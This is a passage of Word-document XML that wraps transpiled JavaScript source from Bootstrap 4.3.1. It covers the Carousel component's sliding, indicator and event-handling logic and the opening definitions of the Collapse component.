        <w:t xml:space="preserve">      if (isGoingToWrap &amp;&amp; !this._config.wrap) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return activeElement;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delta = direction === Direction.PREV ? -1 : 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var itemIndex = (activeIndex + delta) % this._items.length;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return itemIndex === -1 ? this._items[this._items.length - 1] : this._items[itemIndex];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_proto._triggerSlideEvent = function _triggerSlideEvent(relatedTarget, eventDirectionName) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var targetIndex = this._getItemIndex(relatedTarget);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var fromIndex = this._getItemIndex(this._element.querySelector(Selector$2.ACTIVE_ITEM));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var slideEvent = $.Event(Event$2.SLIDE, {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        relatedTarget: relatedTarget,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        direction: eventDirectionName,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        from: fromIndex,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        to: targetIndex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$(this._element).trigger(slideEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return slideEvent;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_proto._setActiveIndicatorElement = function _setActiveIndicatorElement(element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._indicatorsElement) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var indicators = [].slice.call(this._indicatorsElement.querySelectorAll(Selector$2.ACTIVE));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(indicators).removeClass(ClassName$2.ACTIVE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var nextIndicator = this._indicatorsElement.children[this._getItemIndex(element)];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (nextIndicator) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(nextIndicator).addClass(ClassName$2.ACTIVE);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_proto._slide = function _slide(direction, element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var _this4 = this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var activeElement = this._element.querySelector(Selector$2.ACTIVE_ITEM);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      var activeElementIndex = this._getItemIndex(activeElement);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var nextElement = element || activeElement &amp;&amp; this._getItemByDirection(direction, activeElement);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var nextElementIndex = this._getItemIndex(nextElement);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var isCycling = Boolean(this._interval);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var directionalClassName;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var orderClassName;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var eventDirectionName;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (direction === Direction.NEXT) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        directionalClassName = ClassName$2.LEFT;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        orderClassName = ClassName$2.NEXT;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        eventDirectionName = Direction.LEFT;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directionalClassName = ClassName$2.RIGHT;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        orderClassName = ClassName$2.PREV;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        eventDirectionName = Direction.RIGHT;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(nextElement &amp;&amp; $(nextElement).hasClass(ClassName$2.ACTIVE)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._isSliding = false;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slideEvent = this._triggerSlideEvent(nextElement, eventDirectionName);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (slideEvent.isDefaultPrevented())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(!activeElement || !nextElement) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        // Some weirdness is happening, so we bail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this._isSliding = true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (isCycling) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this.pause();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this._setActiveIndicatorElement(nextElement);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var slidEvent = $.Event(Event$2.SLID, {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        relatedTarget: nextElement,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        direction: eventDirectionName,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        from: activeElementIndex,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        to: nextElementIndex</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if ($(this._element).hasClass(ClassName$2.SLIDE)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(nextElement).addClass(orderClassName);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        Util.reflow(nextElement);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(activeElement).addClass(directionalClassName);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(nextElement).addClass(directionalClassName);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var nextElementInterval = parseInt(nextElement.getAttribute('data-interval'), 10);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (nextElementInterval) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          this._config.defaultInterval = this._config.defaultInterval || this._config.interval;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          this._config.interval = nextElementInterval;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        } else {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          this._config.interval = this._config.defaultInterval || this._config.interval;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transitionDuration = Util.getTransitionDurationFromElement(activeElement);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(activeElement).one(Util.TRANSITION_END, function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(nextElement).removeClass(directionalClassName + " " + orderClassName).addClass(ClassName$2.ACTIVE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(activeElement).removeClass(ClassName$2.ACTIVE + " " + orderClassName + " " + directionalClassName);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          _this4._isSliding = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          setTimeout(function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            return $(_this4._element).trigger(slidEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          }, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        }).emulateTransitionEnd(transitionDuration);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$(activeElement).removeClass(ClassName$2.ACTIVE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(nextElement).addClass(ClassName$2.ACTIVE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._isSliding = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(this._element).trigger(slidEvent);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(isCycling) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this.cycle();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Carousel._jQueryInterface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$(this).data(DATA_KEY$2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var _config = _objectSpread({}, Default, $(this).data());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (typeof config === 'object') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          _config = _objectSpread({}, _config, config);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action = typeof config === 'string' ? config : _config.slide;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Carousel(this, _config);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(this).data(DATA_KEY$2,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'number') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          data.to(config);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        } else if (typeof action === 'string') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          if (typeof data[action] === 'undefined') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            throw new TypeError("No method named \"" + action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data[action]();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        } else if (_config.interval &amp;&amp; _config.ride) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          data.pause();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          data.cycle();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Carousel._dataApiClickHandler = function _dataApiClickHandler(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var selector = Util.getSelectorFromElement(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!selector) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/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target = $(selector)[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!target || !$(target).hasClass(ClassName$2.CAROUSEL))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config = _objectSpread({}, $(target).data(), $(this).data());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var slideIndex = this.getAttribute('data-slide-to');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (slideIndex) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        config.interval = false;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Carousel._jQueryInterface.call($(target), config);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (slideIndex) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(target).data(DATA_KEY$2).to(slideIndex);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event.preventDefault();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_createClass(Carousel,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VERSION$2;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Carousel;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$(document).on(Event$2.CLICK_DATA_API, Selector$2.DATA_SLIDE, Carousel._dataApiClickHandler);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $(window).on(Event$2.LOAD_DATA_API, function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var carousels = [].slice.call(document.querySelectorAll(Selector$2.DATA_RIDE));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    for (var i = 0, len = carousels.length; i &lt; len; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var $carousel = $(carousels[i]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      Carousel._jQueryInterface.call($carousel, $carousel.data());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    }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$.fn[NAME$2] = Carousel._jQueryInterface;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME$2].Constructor = Carousel;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME$2].noConflict = function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    $.fn[NAME$2] = JQUERY_NO_CONFLICT$2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    return Carousel._jQueryInterface;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lastRenderedPageBreak/>
        <w:t xml:space="preserve">   */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var NAME$3 = 'collapse';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var VERSION$3 = '4.3.1';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DATA_KEY$3 = 'bs.collapse';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var EVENT_KEY$3 = "." + DATA_KEY$3;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DATA_API_KEY$3 = '.data-api';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var JQUERY_NO_CONFLICT$3 = $.fn[NAME$3];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var Default$1 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    toggle: true,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    parent: ''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DefaultType$1 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    toggle: 'boolean',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    parent: '(string|element)'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Event$3 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOW: "show" + EVENT_KEY$3,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOWN: "shown" + EVENT_KEY$3,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    HIDE: "hide" + EVENT_KEY$3,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    HIDDEN: "hidden" + EVENT_KEY$3,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    CLICK_DATA_API: "click" + EVENT_KEY$3 + DATA_API_KEY$3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ClassName$3 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOW: 'show',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    COLLAPSE: 'collapse',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    COLLAPSING: 'collapsing',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    COLLAPSED: 'collapsed'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Dimension = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    WIDTH: 'width',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    HEIGHT: 'height'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Selector$3 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    ACTIVES: '.show, .collapsing',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DATA_TOGGLE: '[data-toggle="collapse"]'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Collapse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Collapse(element, config) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._isTransitioning = false;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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      this._config = this._getConfig(config);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._triggerArray = [].slice.call(document.querySelectorAll("[data-toggle=\"collapse\"][href=\"#" + element.id + "\"]," + ("[data-toggle=\"collapse\"][data-target=\"#" + element.id + "\"]")));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
